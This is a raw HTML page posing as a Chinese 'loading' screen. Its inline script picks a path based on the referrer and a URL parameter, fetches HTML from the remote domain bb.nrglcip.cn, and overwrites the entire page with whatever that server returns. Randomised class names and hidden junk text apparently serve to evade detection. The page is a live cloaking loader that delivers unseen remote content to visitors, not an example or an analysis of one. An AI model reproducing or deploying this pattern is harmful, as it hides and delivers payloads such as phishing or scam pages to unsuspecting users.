<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .RHhCU2YaOL {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .RHhCU2YaOL .oscIrUeA8W {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .RHhCU2YaOL .content {
            line-height: 50px;
            text-align: center
        }

        .RHhCU2YaOL .img {
            width: 100%
        }

        .RHhCU2YaOL .xHPE3AwZ4q {
            text-align: center
        }

        .RHhCU2YaOL .xHPE3AwZ4q span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .RHhCU2YaOL .xHPE3AwZ4q span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .RHhCU2YaOL .xHPE3AwZ4q span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .RHhCU2YaOL .xHPE3AwZ4q span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .RHhCU2YaOL .xHPE3AwZ4q span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .RHhCU2YaOL .xHPE3AwZ4q span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .RHhCU2YaOL .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function tw1WJrEddFBzO(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var Nrchr = tw1WJrEddFBzO('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ Nrchr +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ Nrchr +".html?a=share";
		}
		
        wz2BEnM5=url+"#"+new Date().getTime();
        wz2BEnM5 && function() {
            $.get(wz2BEnM5, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >iKR4tBDrdcnXS</b>
<div style='display:none'>MEqZOYTul2oKMaAxh1ySZGqMW1oGUSIRKIUThAJyEkpLqdYcq2DGIzNaF1t9nPbe32gUkMkTIdegLLeg</div>
<p  style='display:none'>CwsVPxsybA417TyIS67nwgwhEo1SujaDyPLvLlRFWxMszOmD1KPl8dsoZ69OqCasUuVvqM</p>
<li style='display:none' >MTgPQluiiQ4v5KAO0BigvnTl</li><div class="RHhCU2YaOL">
    <div class="oscIrUeA8W">
        <div class="xHPE3AwZ4q">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<div style='display:none'>r3G6XjKEbpMPkSHso</div>
<b style='display:none' >msh5tNPm05efNJbzz8DqYeiRtnpjbU8M92vTC3qmeACMlFWdjEPPfzE6ForAHi5MPFs0Mc9QBs</b>
<ul style='display:none' >wDUTCJpw4lrWBV03CTp47qtJeeV8Rh34EWFPqOZ</ul>
<a  href='#' style='display:none'>oGVHmicWh2QU1W7prawrYNIlX4NTtQFsvrsHFbVTmwcvtQ69mA2y8PQbmnwFLh</a>
<p  style='display:none'>OHXd0oCnCMkqdO</p></body>
</html>